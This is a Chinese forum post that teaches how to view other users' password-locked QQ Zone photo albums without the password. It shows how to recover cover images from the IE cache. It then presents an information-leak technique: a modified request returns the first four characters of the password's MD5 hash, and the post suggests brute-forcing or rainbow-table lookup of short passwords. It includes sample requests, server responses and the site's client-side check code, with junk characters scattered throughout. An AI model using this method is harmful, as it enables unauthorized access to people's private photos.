|
|
现在很多人都拥有QQ空间,并且上传了自己的照片。当你想看看新朋友的庐山真面目,可惜给相册加了密码。是不是很扫兴,现在就教你破解掉这个密码来观看加密相册。
+ q$ M/ E9 ~0 p" Q. ~
* y$ W6 G$ q& o首先打开一个已经加过密的QQ空间相册页面,然后打开IE“工具-internet-选项”,在“常规”中的“internet临时文件夹”下,依次选择删除“cookies”和“删除文件”删除临时文件夹中所有的cookies和文件,然后再点击“设置”,在“设置窗口”选择“查看文件”,这样就打开了IE临时文件夹。
! G, l7 e3 \ w7 d1 P; u$ e5 g. ~7 p1 C2 M% I2 p [* U) }
然后打开需要破解的加密相册,出现一个对话框需要输入密码,这是选择取消,在刷新一下空间,点击“相册”。作完上面的动作后找到临时文件夹,刷新一下,里面会有一个“cgi_qqzone_static”的XML文档。双击打开它,在弹出的对话框中选择“是”,打开的是一个代码文件。按Ctrl+f查找,输入“我”进行查找,找到<![CDATA[ 我 ]]>这段代码,下面那个地址就是QQ相册的封面地址。复制他就能看到加密图片的封面5 ~4 v& Y% q6 k B A6 k2 F+ t
根据http://izone.qq.com/client/photo ... &album=31931732
0 w( ~/ B1 s9 y% G下载或者翻看Internet临时文件夹下的 photo_password 文件可查到下列语句:
! h; r1 c$ C+ N: Z E# \% htype="text/JavaScript" src=https://www.abc369.net/info/way/"/js/md5.js"></script> ! P1 Z3 P9 ~6 \. d! R. M
document.cookie=("album"+albumId+"pwd="+hex_md5(pwd));
1 ~1 U, Z: w5 e对比 md5.js文件可知,此v2.1版本的 JavaScript MD5,且输入的密码转化为32位的字符串。
: e8 [+ k+ r( p6 \8 Q2 l. u; h. t5 ]: s# Q1 T( i
比较两个地址: 7 ]! @3 j2 A# G- O
http://photo.qq.com/cgi-bin/izon ... mp;albumid=31931732 " d& L0 f0 x- z
/*http://izone.qq.com/client/photo ... amp;album=31931732/这个地址类似可以不看*/
- Q: |/ h- I+ U5 C( _8 u(此地址为有密码情况下的登陆地址,要求输入密码)
* K- Q2 v: V, k' N9 u6 chttp://photo.qq.com/cgi-bin/izon ... asswd=&mode=big
, @+ Y" c( z, v" \/ g(此地址为无密码情况下的登陆地址) . K: w+ g, z+ E* ?
& R' @& f3 u0 {& ]& h4 ], Z由此可以推断出:
- |: B" y, ~ {9 Ohttp://photo.qq.com/cgi-bin/izon ... 1931732&passwd=(广告广告广告广告广告*)&mode=big . g% M, T4 l. K' ~" ^! ^
广告广告为转化后的md5字符串,此地址应该为此地址为有密码情况下的直接登陆地址。 + ~" N7 g; U7 G" x+ l. {
随便输入一段字符显示如下:
7 A, c# |8 z0 H' t, P! ~4 `<?xml version="1.0" encoding="GBK" ?> ) e+ k# Q, d T+ `+ _
<error>密码有误,请重新输入!</error>
' f9 k9 M8 e3 Y考虑到在前面有密码情况下的登陆窗口连接为cgi_album_pwd,浏览相册连接为cgi_album_view。 0 T- ?# Y4 U3 \% U4 W
试将登陆地址改为下列方式:
) `2 L! O+ t; c! k1 m- H5 Y; M! \http://photo.qq.com/cgi-bin/izon ... 1931732&passwd=(广告广告广告广告广告*)&mode=big
# e, m9 g# ?4 h) x0 W# q2 ~2 l/ f随便输入一段字符显示如下:
5 T5 Z5 Y# z' ]4 R" r3 s. I# @' W' Q3 p<?xml version="1.0" encoding="GBK" ?> " B/ x: [6 I; w5 q
<data id="31931732" owner="23266229" passwd="81dc" />
- f F+ k7 P. w G2 C/ x经过换算可知,1234的MD5值是81dc9bdb52d04dc20036dbd8313ed055
( V" L" y/ e+ y* N) T测试数次
+ L2 Z7 H3 `& h. W: {; S- f' K% w7 J<?xml version="1.0" encoding="GBK" ?> " R% _' Z6 n% E4 c
<data id="31931732" owner="23266229" passwd="1bbd" />
. ]) |1 z( D: Q5 \ D( @密码:11111111 MD5:1bbd886460827015e5d605ed44252251 : `& V ]. r* c
<?xml version="1.0" encoding="GBK" ?> ) H" n" m# d3 b3 @- U* ]( k
<data id="31931732" owner="23266229" passwd="eccb" /> ) ?$ j9 h# @- {6 b! I4 j
密码:3 MD5:eccbc87e4b5ce2fe28308fd9f2a7baf3 * p! a4 W. j0 q9 R
由此可以判断,此处的passwd为密码加密后的前4位。
( H+ n9 l& i, x- e( ephoto_password 文件可查到下列语句:
5 U9 `& f; b E' H, y, uvar p=""; ' t! M, W/ u1 @" r6 g$ k
if (x!=null) p=x.selectSingleNode("/data").getAttribute("passwd"); 8 D9 a- Q* y5 H$ i
判断此passwd应该是数据库中的某字段名。
7 t# ?% x* O: H% w+ rif (p!="" && hex_md5(pwd).indexOf(p)!=0){ ' S: s" l8 p6 {" A
alert("密码错误")
4 \, g* b6 { A' v0 w2 Q: ?7 }1 ndocument.getElementById("pass").focus(); ( W' t) ?9 j2 u* x1 Z1 F6 c
return; 4 q# P/ A0 f3 Q; G
}
. x! c7 q! |2 |1 G; udocument.cookie=("album"+albumId+"pwd="+hex_md5(pwd)); 6 j8 F# ^. t% v$ s% x4 `& H" G
location="/client/photo_static_big.htm?uin="+uin+"&album="+albumId; 5 h7 a4 g. R) m. B0 ]: H
pwd为输入的密码,经过md5加密。判断此处出现的passwd="eccb"应该是验证输入的密文密码的正确性的。如果正确,使用hex_md5(pwd)进行登陆。 . M) X, ~: T, l& B0 G
1 @8 d z! ?5 E5 r/ k由于qq相册密码提示为8位,那么如果有心人使用相关工具换算处8位以下的所有数字和字母组合的MD5值做成数据库,那么密码就如同虚设。但是考虑到相册密码意义不大,一般情况下不会有人过于无聊拿机器去跑这东西... 似乎最基本常见的的运算次数为几百万亿次,如果谁又兴趣搞几台服务器跑天把做个数据库倒是蛮好,就是大了点准备个TB级的硬盘矩阵吧。如果怕麻烦可以去国外的几个大型MD5数据库查询
2 C6 w2 v- C8 h$ X" u( P |
|
|手机版|小黑屋|☆我要吧☆
( 豫ICP备13016831号-1 )
狗仔卡
发表于 2016-4-6 22:05:08
提升卡
置顶卡
锁贴卡
解贴卡
变色卡
显身卡